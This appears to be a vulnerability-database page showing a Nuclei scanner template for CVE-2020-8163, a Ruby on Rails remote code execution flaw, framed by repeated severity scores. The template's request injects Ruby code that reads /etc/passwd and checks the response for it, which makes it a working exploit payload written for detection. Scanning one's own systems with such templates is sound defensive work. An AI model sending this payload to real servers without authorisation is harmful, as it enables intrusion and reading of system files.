Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-8163
HistoryAug 22, 2020 - 9:47 p.m.

Ruby on Rails <5.0.1 - Remote Code Execution

2020-08-2221:47:58
ProjectDiscovery
github.com
7

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

8.8 High

AI Score

Confidence

High

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

0.968 High

EPSS

Percentile

99.7%

Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials.

id: CVE-2020-8163

info:
  name: Ruby on Rails <5.0.1 - Remote Code Execution
  author: tim_koopmans
  severity: high
  description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution.
  remediation: |
    Upgrade Ruby on Rails to version 5.0.1 or above.
  reference:
    - https://hackerone.com/reports/304805
    - https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0
    - https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8163
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-8163
    cwe-id: CWE-94
    epss-score: 0.97016
    epss-percentile: 0.99691
    cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rubyonrails
    product: rails
  tags: cve,cve2020,rails,rce,hackerone,rubyonrails

http:
  - method: GET
    path:
      - "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210095f2004035f79cbcb4af27718650ade78e8f25da899e3692309e6ddbcfe39faa022059a57f2c0fa7b3f659a52948e81555e06688f8163061909b9c5647d723f90de6:922c64590222798bb761d5b6d8e72950

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

8.8 High

AI Score

Confidence

High

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

0.968 High

EPSS

Percentile

99.7%